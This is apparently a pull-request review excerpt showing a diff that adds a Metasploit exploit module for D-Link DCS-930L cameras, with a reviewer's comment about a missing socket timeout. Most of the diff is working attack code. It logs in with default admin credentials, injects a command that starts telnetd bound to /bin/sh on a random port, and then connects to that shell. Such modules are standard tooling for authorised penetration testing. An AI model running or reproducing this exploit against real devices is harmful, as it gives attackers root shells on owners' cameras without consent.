modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb

```diff
@@ -0,0 +1,170 @@
+        This vulnerability was present in firmware version 2.01 and fixed
+        by 2.12.
+      },
+      'Author'      =>
+        [
+          'Nicholas Starke <nick@alephvoid.com>'
+        ],
+      'License'         => MSF_LICENSE,
+      'DisclosureDate'  => 'Dec 20 2015',
+      'Privileged'      => true,
+      'Platform'        => 'unix',
+      'Arch'            => ARCH_CMD,
+      'Payload'         =>
+        {
+          'Compat'  => {
+          'PayloadType'    => 'cmd_interact',
+          'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+      'Targets'        =>
+        [
+          [  'Automatic',     { } ],
+        ],
+      'DefaultTarget'  => 0
+     ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', ''])
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]),
+        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+      ], self.class)
+  end
+
+  def telnet_timeout
+    (datastore['TelnetTimeout'] || 10).to_i
+  end
+
+  def banner_timeout
+    (datastore['TelnetBannerTimeout'] || 25).to_i
+  end
+
+  def exploit
+    print_status('Exploiting')
+    user = datastore['USERNAME']
+    if datastore['PASSWORD'].nil?
+      pass = ""
+    else
+      pass = datastore['PASSWORD']
+    end
+    test_login(user, pass)
+    exploit_telnet
+  end
+
+  def test_login(user, pass)
+    print_status("#{peer} - Trying to login with #{user} / #{pass}")
+    begin
+      res = send_request_cgi({
+        'uri' => '/',
+        'method' => 'GET',
+        'authorization' => basic_auth(user, pass)
+      })
+
+      if res.nil?
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response")
+      end
+
+      if (res.code != 200)
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}")
+      else
+        print_good("#{peer} - Successful login #{user} / #{pass}")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unknown, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit_telnet
+    telnet_port = rand(32767) + 32768
+
+    print_status("#{peer} - Telnet Port: #{telnet_port}")
+
+    cmd = "telnetd -p #{telnet_port} -l/bin/sh"
+
+    telnet_request(cmd)
+
+    print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...")
+    ctx = { 'Msf' => framework, 'MsfExploit' => self }
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 0 })
```

Comment:
Shouldn't we set a timeout here? therwise the code will hang forever and the next line will never be reached.